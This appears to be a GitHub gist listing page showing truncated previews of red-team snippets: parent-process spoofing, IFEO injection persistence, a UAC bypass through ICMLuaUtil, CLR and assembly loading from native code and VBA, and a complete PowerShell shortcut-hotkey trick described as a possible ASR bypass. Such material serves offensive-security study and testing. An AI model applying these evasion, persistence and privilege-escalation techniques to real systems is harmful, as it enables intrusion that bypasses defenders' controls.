Skip to content

Instantly share code, notes, and snippets.

View decay88's full-sized avatar

decay88

149 followers · 387 following
View GitHub Profile
@gavz
gavz / PPID Spoof & BlockDLLs
Created January 12, 2020 21:53 — forked from rasta-mouse/PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@gavz
gavz / PPID Spoof & BlockDLLs
Created January 12, 2020 21:53 — forked from rasta-mouse/PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@rasta-mouse
rasta-mouse / PPID Spoof & BlockDLLs
Last active April 1, 2025 22:39
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@netbiosX
netbiosX / ImageFileExecutionOptions.ps1
Last active June 14, 2024 09:22
Image File Execution Options Injection - Persistence Technique
<#
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/
function Persist-Debugger
@c18t
c18t / 00_DynamicSubClass.cs
Last active December 16, 2019 18:24
サブクラスを実行時に生成してプロパティに属性を付与するテスト
namespace DynamicSubClass
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Reflection.Emit;
using Microsoft.VisualStudio.TestTools.UnitTesting;
public class ParentClass
@gavz
gavz / snippet.cs
Created November 21, 2019 15:19 — forked from silentbreaksec/snippet.cs
Convert C# EXE to Assembly
[DllImport("shell32.dll", SetLastError = true)]
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
public static string[] CommandLineToArgs(string commandLine)
{
int argc;
var argv = CommandLineToArgvW(commandLine, out argc);
if (argv == IntPtr.Zero)
throw new System.ComponentModel.Win32Exception();
try
@gavz
gavz / cmlua.cs
Created October 24, 2019 23:04 — forked from Moriarty2016/cmlua.cs
Bypass UAC with ICMLuaUtil --- .Net Version
using System;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;
namespace Test1
{
public static class Test
{
internal enum HRESULT : long
@b4rtik
b4rtik / clr_via_native.c
Created October 3, 2019 00:05 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@monoxgas
monoxgas / shortcut.ps1
Last active May 29, 2020 14:49
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
$Shell = New-Object -Com WScript.Shell
$S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk")
$S.TargetPath = "calc.exe"
$S.Hotkey = "Ctrl+U"
$S.Save()
$Shell.SendKeys("^u")
Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk"